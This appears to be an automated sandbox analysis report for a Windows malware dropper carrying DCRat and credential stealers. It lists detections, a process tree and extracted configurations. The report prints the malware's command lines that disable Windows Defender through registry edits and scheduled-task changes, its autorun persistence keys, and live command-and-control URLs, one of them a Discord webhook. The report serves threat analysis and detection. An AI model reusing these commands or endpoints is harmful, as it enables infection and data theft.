Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FixTsDfhiC.exe

Overview

General Information

Sample name:FixTsDfhiC.exe
renamed because original name is a hash value
Original sample name:BBD6FFDB33259778F08704696A04891F.exe
Analysis ID:1545204
MD5:bbd6ffdb33259778f08704696a04891f
SHA1:0fd836bb4bfc035ff35ebe0fb47e4693cec9e8ba
SHA256:841eb644979b3c640761762645c9cd26f9bb46e558eaeb7bf0c2a79e761878f4
Tags:exeFormbookuser-abuse_ch
Infos:

Detection

Blank Grabber, DCRat, Umbral Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Blank Grabber
Yara detected DCRat
Yara detected Umbral Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Detected VMProtect packer
Disable Windows Defender real time protection (registry)
Disables Windows Defender (deletes autostart)
Drops PE files to the user root directory
Drops PE files with benign system names
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Sigma detected: Disable Important Scheduled Task
Sigma detected: Files With System Process Name In Unsuspected Locations
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to evade analysis by execution special instruction (VM detection)
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Too many similar processes found
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • FixTsDfhiC.exe (PID: 7300 cmdline: "C:\Users\user\Desktop\FixTsDfhiC.exe" MD5: BBD6FFDB33259778F08704696A04891F)
    • Lunch LaCheatV2.exe (PID: 7344 cmdline: "C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe" MD5: 7DB5128F7A81CC1AF094D8898E79FF21)
      • Lunch LaCheat.exe (PID: 7972 cmdline: "C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe" MD5: B76057DF968A944446F950DD4DDC6AEC)
        • DCRatBuild.exe (PID: 8060 cmdline: "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe" MD5: 6E01D4882274684F48E04436103AD57F)
          • wscript.exe (PID: 8108 cmdline: "C:\Windows\System32\WScript.exe" "C:\blockweb\J6PsSzBYKK7mXTJyYh2Tgne.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
            • cmd.exe (PID: 7328 cmdline: C:\Windows\system32\cmd.exe /c ""C:\blockweb\TOdra8QNG4wQEWkSimCHh9eVG.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 7376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • portrefNet.exe (PID: 7300 cmdline: "C:\blockweb\portrefNet.exe" MD5: 84C6CB042DC58A109DFA2DB8381BEC28)
          • wscript.exe (PID: 8140 cmdline: "C:\Windows\System32\WScript.exe" "C:\blockweb\file.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
        • 52cheatand52rat.exe (PID: 8100 cmdline: "C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe" MD5: 06129FFC46E854930CFCAA754CA1D487)
          • WMIC.exe (PID: 1432 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
            • conhost.exe (PID: 824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7404 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 7448 cmdline: reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7464 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7480 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7500 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7516 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7532 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7548 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7568 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7588 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7604 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7624 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7640 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7656 cmdline: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7672 cmdline: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7688 cmdline: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • schtasks.exe (PID: 7704 cmdline: schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable MD5: 48C2FE20575769DE916F48EF0676A965)
      • schtasks.exe (PID: 7720 cmdline: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable MD5: 48C2FE20575769DE916F48EF0676A965)
      • schtasks.exe (PID: 7736 cmdline: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable MD5: 48C2FE20575769DE916F48EF0676A965)
      • schtasks.exe (PID: 7752 cmdline: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable MD5: 48C2FE20575769DE916F48EF0676A965)
      • schtasks.exe (PID: 7768 cmdline: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable MD5: 48C2FE20575769DE916F48EF0676A965)
      • reg.exe (PID: 7784 cmdline: reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7800 cmdline: reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7816 cmdline: reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7832 cmdline: reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7848 cmdline: reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7864 cmdline: reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7880 cmdline: reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7896 cmdline: reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7912 cmdline: reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7928 cmdline: reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"SCRT": "{\"y\":\"&\",\"9\":\"*\",\"c\":\"~\",\"w\":\">\",\"z\":\"%\",\"I\":\".\",\"U\":\")\",\"V\":\"`\",\"T\":\"-\",\"O\":\"|\",\"e\":\"#\",\"l\":\"!\",\"d\":\"(\",\"n\":\"$\",\"u\":\" \",\"0\":\"<\",\"5\":\",\",\"D\":\"@\",\"P\":\";\",\"A\":\"_\",\"k\":\"^\"}", "PCRT": "{\"1\":\"`\",\"0\":\"%\",\"U\":\">\",\"B\":\"(\",\"i\":\"*\",\"E\":\";\",\"S\":\"$\",\"j\":\".\",\"N\":\"!\",\"W\":\" \",\"F\":\"&\",\"m\":\")\",\"b\":\"|\",\"V\":\"<\",\"2\":\"-\",\"M\":\"_\",\"k\":\"#\",\"Z\":\",\",\"z\":\"^\",\"d\":\"@\",\"J\":\"~\"}", "TAG": "", "MUTEX": "DCR_MUTEX-m6OlBBIvNMvFZXdW1d4i", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 2, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://cp91897.tw1.ru/@=MzY2MWOkV2N", "H2": "http://cp91897.tw1.ru/@=MzY2MWOkV2N", "T": "0"}

Threatname: Umbral Stealer

{"C2 url": "https://discord.com/api/webhooks/1266665187293794356/BgUJDQi9QXAA0avjRcAiy-uTUWdbVUSk8SQjon--JNjDxPP5bEhE6DLfJFghJ_KLSRhA ", "Version": "v1.3"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
    C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
      C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
      • 0x31888:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
      • 0x31a0e:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
      • 0x31aaa:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
        00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
          00000022.00000002.1824992539.0000000004F70000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
            00000022.00000002.1824992539.0000000004F70000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
              00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                Click to see the 13 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                36.0.52cheatand52rat.exe.239bb8d0000.0.unpackJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                  36.0.52cheatand52rat.exe.239bb8d0000.0.unpackJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
                    36.0.52cheatand52rat.exe.239bb8d0000.0.unpackINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
                    • 0x31888:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
                    • 0x31a0e:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
                    • 0x31aaa:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
                    34.3.Lunch LaCheat.exe.1b56998.5.unpackJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                      34.3.Lunch LaCheat.exe.1b56998.5.unpackJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
                        Click to see the 10 entries

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Disable Important Scheduled Task
                        Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable, CommandLine: schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7404, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable, ProcessId: 7704, ProcessName: schtasks.exe
                        Sigma detected: Files With System Process Name In Unsuspected Locations
                        Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\blockweb\portrefNet.exe, ProcessId: 7300, TargetFilename: C:\Windows\AppReadiness\dwm.exe
                        Sigma detected: CurrentVersion Autorun Keys Modification
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Recovery\ukzoUeHPfeDwGdTDRNL.exe", EventID: 13, EventType: SetValue, Image: C:\blockweb\portrefNet.exe, ProcessId: 7300, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ukzoUeHPfeDwGdTDRNL
                        Sigma detected: CurrentVersion NT Autorun Keys Modification
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Recovery\ukzoUeHPfeDwGdTDRNL.exe", EventID: 13, EventType: SetValue, Image: C:\blockweb\portrefNet.exe, ProcessId: 7300, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\blockweb\J6PsSzBYKK7mXTJyYh2Tgne.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\blockweb\J6PsSzBYKK7mXTJyYh2Tgne.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe, ParentProcessId: 8060, ParentProcessName: DCRatBuild.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\blockweb\J6PsSzBYKK7mXTJyYh2Tgne.vbe" , ProcessId: 8108, ProcessName: wscript.exe

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-10-30T08:43:02.046365+010020341941A Network Trojan was detected192.168.2.44974592.53.106.11480TCP
                        2024-10-30T08:43:13.265199+010020341941A Network Trojan was detected192.168.2.44980392.53.106.11480TCP
                        2024-10-30T08:43:27.937516+010020341941A Network Trojan was detected192.168.2.44989092.53.106.11480TCP
                        2024-10-30T08:43:51.421636+010020341941A Network Trojan was detected192.168.2.45001392.53.106.11480TCP
                        2024-10-30T08:43:59.906040+010020341941A Network Trojan was detected192.168.2.45001692.53.106.11480TCP
                        2024-10-30T08:44:07.859223+010020341941A Network Trojan was detected192.168.2.45001992.53.106.11480TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus / Scanner detection for submitted sample
                        Source: FixTsDfhiC.exeAvira: detected
                        Antivirus detection for dropped file
                        Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                        Source: C:\blockweb\WmiPrvSE.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                        Source: C:\blockweb\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                        Source: C:\Windows\AppReadiness\dwm.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                        Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                        Source: C:\Users\user\AppData\Local\Temp\Nu8jJRNGRr.batAvira: detection malicious, Label: BAT/Delbat.C
                        Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeAvira: detection malicious, Label: HEUR/AGEN.1307507
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                        Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeAvira: detection malicious, Label: VBS/Runner.VPG
                        Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                        Source: C:\Users\Default\ApplicationFrameHost.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                        Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                        Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                        Source: C:\Windows\INF\.NET Data Provider for Oracle\SgrmBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                        Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                        Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                        Source: C:\blockweb\J6PsSzBYKK7mXTJyYh2Tgne.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                        Source: C:\blockweb\portrefNet.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                        Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                        Found malware configuration
                        Source: 0000002C.00000002.1950988676.000000001256F000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"SCRT": "{\"y\":\"&\",\"9\":\"*\",\"c\":\"~\",\"w\":\">\",\"z\":\"%\",\"I\":\".\",\"U\":\")\",\"V\":\"`\",\"T\":\"-\",\"O\":\"|\",\"e\":\"#\",\"l\":\"!\",\"d\":\"(\",\"n\":\"$\",\"u\":\" \",\"0\":\"<\",\"5\":\",\",\"D\":\"@\",\"P\":\";\",\"A\":\"_\",\"k\":\"^\"}", "PCRT": "{\"1\":\"`\",\"0\":\"%\",\"U\":\">\",\"B\":\"(\",\"i\":\"*\",\"E\":\";\",\"S\":\"$\",\"j\":\".\",\"N\":\"!\",\"W\":\" \",\"F\":\"&\",\"m\":\")\",\"b\":\"|\",\"V\":\"<\",\"2\":\"-\",\"M\":\"_\",\"k\":\"#\",\"Z\":\",\",\"z\":\"^\",\"d\":\"@\",\"J\":\"~\"}", "TAG": "", "MUTEX": "DCR_MUTEX-m6OlBBIvNMvFZXdW1d4i", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 2, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://cp91897.tw1.ru/@=MzY2MWOkV2N", "H2": "http://cp91897.tw1.ru/@=MzY2MWOkV2N", "T": "0"}
                        Source: 36.0.52cheatand52rat.exe.239bb8d0000.0.unpackMalware Configuration Extractor: Umbral Stealer {"C2 url": "https://discord.com/api/webhooks/1266665187293794356/BgUJDQi9QXAA0avjRcAiy-uTUWdbVUSk8SQjon--JNjDxPP5bEhE6DLfJFghJ_KLSRhA ", "Version": "v1.3"}
                        Multi AV Scanner detection for dropped file
                        Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exeReversingLabs: Detection: 87%
                        Source: C:\Program Files\7-Zip\Lang\ukzoUeHPfeDwGdTDRNL.exeReversingLabs: Detection: 87%
                        Source: C:\Program Files\Windows Portable Devices\ukzoUeHPfeDwGdTDRNL.exeReversingLabs: Detection: 87%
                        Source: C:\ProgramData\Package Cache\{D5D19E2F-7189-42FE-8103-92CD1FA457C2}v14.36.32532\ukzoUeHPfeDwGdTDRNL.exeReversingLabs: Detection: 87%
                        Source: C:\Recovery\ukzoUeHPfeDwGdTDRNL.exeReversingLabs: Detection: 87%
                        Source: C:\Users\Default\ApplicationFrameHost.exeReversingLabs: Detection: 87%
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeReversingLabs: Detection: 84%
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeReversingLabs: Detection: 65%
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeReversingLabs: Detection: 83%
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeReversingLabs: Detection: 75%
                        Source: C:\Users\user\Videos\ukzoUeHPfeDwGdTDRNL.exeReversingLabs: Detection: 87%
                        Source: C:\Users\user\ukzoUeHPfeDwGdTDRNL.exeReversingLabs: Detection: 87%
                        Source: C:\Windows\AppReadiness\dwm.exeReversingLabs: Detection: 87%
                        Source: C:\Windows\INF\.NET Data Provider for Oracle\SgrmBroker.exeReversingLabs: Detection: 87%
                        Source: C:\Windows\Performance\WinSAT\DataStore\ukzoUeHPfeDwGdTDRNL.exeReversingLabs: Detection: 87%
                        Source: C:\Windows\Setup\State\ukzoUeHPfeDwGdTDRNL.exeReversingLabs: Detection: 87%
                        Source: C:\blockweb\RuntimeBroker.exeReversingLabs: Detection: 87%
                        Source: C:\blockweb\WmiPrvSE.exeReversingLabs: Detection: 87%
                        Source: C:\blockweb\portrefNet.exeReversingLabs: Detection: 87%
                        Source: C:\blockweb\ukzoUeHPfeDwGdTDRNL.exeReversingLabs: Detection: 87%
                        Multi AV Scanner detection for submitted file
                        Source: FixTsDfhiC.exeReversingLabs: Detection: 92%
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Machine Learning detection for dropped file
                        Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exeJoe Sandbox ML: detected
                        Source: C:\blockweb\WmiPrvSE.exeJoe Sandbox ML: detected
                        Source: C:\blockweb\RuntimeBroker.exeJoe Sandbox ML: detected
                        Source: C:\Windows\AppReadiness\dwm.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exeJoe Sandbox ML: detected
                        Source: C:\Users\Default\ApplicationFrameHost.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exeJoe Sandbox ML: detected
